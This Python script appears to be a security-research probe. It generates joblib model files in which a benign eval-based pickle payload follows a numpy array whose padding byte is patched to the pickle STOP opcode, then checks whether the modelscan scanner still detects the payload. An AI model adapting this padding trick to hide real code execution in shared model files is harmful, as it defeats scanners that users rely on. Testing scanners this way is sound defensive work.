| |
| """Generate benign Joblib artifacts for numpy padding traversal checks.""" |
|
|
| from __future__ import annotations |
|
|
| import argparse |
| import io |
| import json |
| import os |
| import pathlib |
| import pickletools |
| import re |
| import shutil |
| import subprocess |
| from dataclasses import dataclass |
| from typing import Any |
|
|
| import joblib |
| import numpy as np |
|
|
|
|
# Constant string the benign payload evaluates to; contains_marker() looks for
# it in the loaded value.
MARKER = "BENIGN_JOBLIB_MARKER"
# Byte value of the pickle STOP opcode, b"." (0x2E).
PICKLE_STOP = ord(".")
# Filler byte inserted after the padding-length byte when the padding grows.
JOBLIB_PADDING_BYTE = bytes([0xFF])
# Pickle protocol handed to joblib.dump for every generated artifact.
PICKLE_PROTOCOL = 4
|
|
|
|
class BenignEval:
    """Harmless stand-in for an unsafe-global payload.

    Pickling an instance records a call to ``eval`` whose only argument is
    the ``repr`` of ``MARKER``, so unpickling yields that constant string.
    """

    def __reduce__(self) -> tuple[Any, tuple[str]]:
        """Return the ``(callable, args)`` pair pickle stores for this object."""
        # The expression is a quoted string literal built from a module
        # constant; no external input ever reaches eval here.
        expression = repr(MARKER)
        return eval, (expression,)
|
|
|
|
@dataclass(frozen=True)
class PaddingPatch:
    """Immutable record of one padding-length rewrite and the offsets it moved."""

    # Position of the padding-length byte that was rewritten.
    offset: int
    # Value of that byte before the rewrite.
    original_length: int
    # Value of that byte after the rewrite.
    patched_length: int
    # Number of filler bytes added to the stream.
    inserted_bytes: int
    # Where the array data started before the rewrite.
    array_data_offset_before: int
    # Where the array data starts after the rewrite.
    array_data_offset_after: int
|
|
|
|
def dump_joblib_bytes(value: Any) -> bytes:
    """Serialize *value* with joblib into memory and return the raw bytes.

    The dump is uncompressed (``compress=0``) and uses ``PICKLE_PROTOCOL``.
    """
    with io.BytesIO() as sink:
        joblib.dump(value, sink, compress=0, protocol=PICKLE_PROTOCOL)
        return sink.getvalue()
|
|
|
|
def find_first_numpy_padding(data: bytes) -> int:
    """Return the offset at which ``pickletools`` stops parsing *data*.

    The stream is walked opcode by opcode. The offset is taken from the
    ``ValueError`` message that ``pickletools.genops`` raises, and is only
    accepted when the last opcode parsed before the failure was ``BUILD``
    and the bytes before the offset contain ``numpy_array_alignment_bytes``.

    Raises:
        RuntimeError: if the stream parses cleanly, if the error message
            carries no position, if the last opcode was not ``BUILD``, or
            if the alignment metadata string is missing before the offset.
    """
    previous_opcode = None
    try:
        for op, _arg, _pos in pickletools.genops(data):
            previous_opcode = op.name
    except ValueError as exc:
        located = re.search(r"position (\d+)", str(exc))
        if located is None:
            raise RuntimeError(f"could not locate pickle parse stop: {exc}") from exc
        if previous_opcode != "BUILD":
            raise RuntimeError(
                "pickle parsing did not stop immediately after a numpy wrapper BUILD"
            )
        stop_offset = int(located.group(1))
        # Restrict the search to the bytes that precede the parse stop.
        if data.find(b"numpy_array_alignment_bytes", 0, stop_offset) == -1:
            raise RuntimeError("joblib numpy alignment metadata was not found")
        return stop_offset

    # genops finished without error, so nothing interrupted the pickle stream.
    raise RuntimeError("expected raw numpy array bytes to interrupt pickle parsing")
|
|
|
|
def patch_padding_to_stop(data: bytes) -> tuple[bytes, PaddingPatch]:
    """Rewrite the padding-length byte to ``PICKLE_STOP`` and grow the padding.

    The byte at the offset found by ``find_first_numpy_padding`` is replaced
    with ``PICKLE_STOP``. Enough ``JOBLIB_PADDING_BYTE`` filler is inserted
    right after it that the total padding equals the new length value.

    Returns:
        The patched bytes and a ``PaddingPatch`` describing the change.

    Raises:
        RuntimeError: if the existing length byte is outside 1..64, or is
            already at or above ``PICKLE_STOP``.
    """
    offset = find_first_numpy_padding(data)
    current_length = data[offset]
    if current_length < 1 or current_length > 64:
        raise RuntimeError(f"unexpected joblib padding length: {current_length}")
    if current_length >= PICKLE_STOP:
        raise RuntimeError(
            f"padding length {current_length} does not need a STOP-byte expansion"
        )

    extra = PICKLE_STOP - current_length
    head = data[:offset]
    # The tail still begins with the original padding bytes; the inserted
    # filler sits in front of them.
    tail = data[offset + 1 :]
    patched = head + bytes((PICKLE_STOP,)) + JOBLIB_PADDING_BYTE * extra + tail

    after_length_byte = offset + 1
    record = PaddingPatch(
        offset=offset,
        original_length=current_length,
        patched_length=PICKLE_STOP,
        inserted_bytes=extra,
        array_data_offset_before=after_length_byte + current_length,
        array_data_offset_after=after_length_byte + PICKLE_STOP,
    )
    return patched, record
|
|
|
|
def write_bytes(path: pathlib.Path, data: bytes) -> None:
    """Write *data* to *path*, creating any missing parent directories first."""
    directory = path.parent
    directory.mkdir(parents=True, exist_ok=True)
    path.write_bytes(data)
|
|
|
|
def load_status(path: pathlib.Path) -> dict[str, Any]:
    """Load *path* with joblib and describe the outcome as a plain dict.

    Returns:
        On success: ``status`` ``"ok"`` plus the loaded value's type name,
        its ``repr`` and whether ``contains_marker`` found the marker.
        On failure: ``status`` ``"error"`` plus ``"<ExceptionType>: <first
        line of the message>"``.

    NOTE(review): ``joblib.load`` unpickles the file, so whatever reducer the
    artifact embeds is executed. Only point this at files this script wrote.
    """
    try:
        value = joblib.load(path)
    except Exception as exc:  # reporting boundary: failures become data
        # An exception raised without a message has str(exc) == "", and
        # "".splitlines() is []. Indexing [0] there would raise IndexError
        # from inside this handler and hide the real load failure.
        first_line = next(iter(str(exc).splitlines()), "")
        return {
            "status": "error",
            "error": f"{type(exc).__name__}: {first_line}",
        }

    return {
        "status": "ok",
        "type": type(value).__name__,
        "repr": repr(value),
        "marker_found": contains_marker(value),
    }
|
|
|
|
def contains_marker(value: Any) -> bool:
    """Report whether ``MARKER`` appears as a string inside *value*.

    A string matches only when it equals ``MARKER`` exactly. Dict values and
    list/tuple items are searched recursively. Every other kind of value
    (arrays, bytes-like objects, ``None``, numbers, anything else) is
    treated as not containing the marker.
    """
    if isinstance(value, str):
        return value == MARKER

    if isinstance(value, dict):
        children = value.values()
    elif isinstance(value, (list, tuple)):
        children = value
    else:
        # Leaf values are never descended into.
        return False

    return any(contains_marker(child) for child in children)
|
|
|
|
def opcode_positions(data: bytes, opcode_name: str, start: int = 0) -> list[int]:
    """List the offsets of every *opcode_name* opcode parsed from ``data[start:]``.

    Offsets are reported relative to the beginning of *data*, not to *start*.
    Parsing ends where ``pickletools.genops`` ends (at the first STOP opcode).
    """
    return [
        start + relative
        for op, _arg, relative in pickletools.genops(data[start:])
        if op.name == opcode_name
    ]
|
|
|
|
def opcode_offsets(data: bytes) -> dict[str, int | None]:
    """Locate a few byte patterns of interest inside *data*.

    These are plain byte searches, not opcode-aware parsing.
    ``final_stop_opcode`` is simply the last occurrence of the
    ``PICKLE_STOP`` byte value, wherever it appears in the stream.

    Returns:
        A dict mapping each label to its offset, or ``None`` when the
        pattern does not occur.
    """
    # rfind reports absence as -1; normalise it to None so every entry uses
    # the same "not found" value and matches the declared return type.
    last_stop = data.rfind(bytes([PICKLE_STOP]))
    return {
        "builtins_string": find_bytes(data, b"builtins"),
        "eval_string": find_bytes(data, b"eval"),
        "marker_string": find_bytes(data, MARKER.encode()),
        "final_stop_opcode": last_stop if last_stop >= 0 else None,
    }
|
|
|
|
def find_bytes(data: bytes, needle: bytes) -> int | None:
    """Return the first offset of *needle* in *data*, or ``None`` if absent."""
    index = data.find(needle)
    if index < 0:
        return None
    return index
|
|
|
|
def modelscan(path: pathlib.Path, command: pathlib.Path | None) -> dict[str, Any]:
    """Run the modelscan executable against *path* and summarize its JSON report.

    Returns:
        ``{"status": "skipped"}`` when *command* is ``None``;
        ``{"status": "missing", "command": ...}`` when *command* does not
        exist; otherwise a dict with the parse status, the process return
        code and selected fields of the report (``None`` where unavailable).
    """
    if command is None:
        return {"status": "skipped"}
    if not command.exists():
        return {"status": "missing", "command": str(command)}

    argv = [str(command), "-p", str(path), "-r", "json", "--show-skipped"]
    # NOTE(review): the very wide COLUMNS value presumably keeps the tool
    # from wrapping its output; confirm against modelscan's behavior.
    environment = dict(os.environ, COLUMNS="20000")
    result = subprocess.run(
        argv,
        text=True,
        capture_output=True,
        env=environment,
        check=False,
    )

    output = result.stdout.strip()
    # Anything printed before the first "{" is ignored.
    brace = output.find("{")
    report: dict[str, Any] | None = None
    if brace != -1:
        try:
            report = json.loads(output[brace:])
        except json.JSONDecodeError:
            report = None
    if report is None:
        report = {"parse_error": output}

    summary = report.get("summary")
    version = None
    issue_count = None
    if summary:
        version = summary.get("modelscan_version")
        issue_count = summary.get("total_issues")

    return {
        "status": "parse_error" if "parse_error" in report else "ok",
        "returncode": result.returncode,
        "modelscan_version": version,
        "total_issues": issue_count,
        "errors": report.get("errors"),
    }
|
|
|
|
def summarize(
    case: str,
    path: pathlib.Path,
    modelscan_command: pathlib.Path | None,
    extra_offsets: dict[str, Any] | None = None,
) -> dict[str, Any]:
    """Build the report for one artifact on disk.

    The report holds the case label, the path, the file size, the
    ``load_status`` result, byte offsets from ``opcode_offsets`` (extended
    or overridden by *extra_offsets*) and the ``modelscan`` result.
    """
    raw = path.read_bytes()
    offsets: dict[str, Any] = {**opcode_offsets(raw), **(extra_offsets or {})}
    # The load is attempted before the scanner runs, as in the report order.
    load_report = load_status(path)
    scan_report = modelscan(path, modelscan_command)
    return {
        "case": case,
        "path": str(path),
        "size": len(raw),
        "joblib_load": load_report,
        "offsets": offsets,
        "modelscan": scan_report,
    }
|
|
|
|
def main() -> int:
    """Generate the control and patched artifacts and print one JSON report each.

    Two files are written under the output directory: a direct dump of the
    benign payload, and a dump of ``[array, payload]`` whose padding-length
    byte has been patched. A JSON summary line is printed for each.

    Returns:
        ``0`` on completion.
    """
    cli = argparse.ArgumentParser()
    cli.add_argument(
        "output_dir",
        nargs="?",
        type=pathlib.Path,
        default=pathlib.Path("corpus/joblib_numpy_padding_probe"),
    )
    cli.add_argument("--modelscan-command", type=pathlib.Path, default=None)
    cli.add_argument("--skip-modelscan", action="store_true")
    options = cli.parse_args()

    if options.skip_modelscan:
        modelscan_command = None
    else:
        modelscan_command = resolve_modelscan_command(options.modelscan_command)

    out_dir = options.output_dir
    control_path = out_dir / "control_direct.joblib"
    candidate_path = out_dir / "candidate_numpy_array_then_payload_patched.joblib"

    # Control: the payload alone, written exactly as joblib produced it.
    control_bytes = dump_joblib_bytes(BenignEval())
    write_bytes(control_path, control_bytes)

    # Candidate: an array followed by the payload, with the padding patched.
    array = np.array([PICKLE_STOP, *range(7)], dtype=np.uint8)
    unpatched = dump_joblib_bytes([array, BenignEval()])
    patched, patch = patch_padding_to_stop(unpatched)
    write_bytes(candidate_path, patched)

    control_extras = {
        "payload_reduce_opcode_offsets": opcode_positions(control_bytes, "REDUCE"),
    }
    control_report = summarize(
        "control_direct",
        control_path,
        modelscan_command,
        control_extras,
    )
    print(json.dumps(control_report, sort_keys=True))

    # Opcode parsing for the payload resumes right after the array's raw bytes.
    data_start = patch.array_data_offset_after
    payload_frame_offset = data_start + array.nbytes
    candidate_extras = {
        "padding_length_offset": patch.offset,
        "padding_original_length": patch.original_length,
        "padding_patched_length": patch.patched_length,
        "padding_inserted_bytes": patch.inserted_bytes,
        "array_data_offset_before_patch": patch.array_data_offset_before,
        "array_data_offset_after_patch": data_start,
        "array_first_byte_after_patch": patched[data_start],
        "payload_frame_offset_after_patch": payload_frame_offset,
        "payload_reduce_opcode_offsets_after_patch": opcode_positions(
            patched,
            "REDUCE",
            payload_frame_offset,
        ),
    }
    candidate_report = summarize(
        "candidate_numpy_array_then_payload_patched",
        candidate_path,
        modelscan_command,
        candidate_extras,
    )
    print(json.dumps(candidate_report, sort_keys=True))
    return 0
|
|
|
|
def resolve_modelscan_command(command: pathlib.Path | None) -> pathlib.Path | None:
    """Pick the modelscan executable to use.

    Preference order: an explicitly supplied *command*, then the local
    ``.venv-modelscan`` binary if it exists, then whatever ``modelscan``
    resolves to on ``PATH``. When none is found, the local venv path is
    returned even though it does not exist.
    """
    if command is not None:
        return command

    venv_binary = pathlib.Path(".venv-modelscan/bin/modelscan")
    if not venv_binary.exists():
        on_path = shutil.which("modelscan")
        if on_path is not None:
            return pathlib.Path(on_path)

    # Either the venv binary exists, or nothing was found and the caller
    # receives the (missing) venv path.
    return venv_binary
|
|
|
|
# Script entry point: exit the process with whatever main() returns.
if __name__ == "__main__":
    exit_code = main()
    raise SystemExit(exit_code)
|
|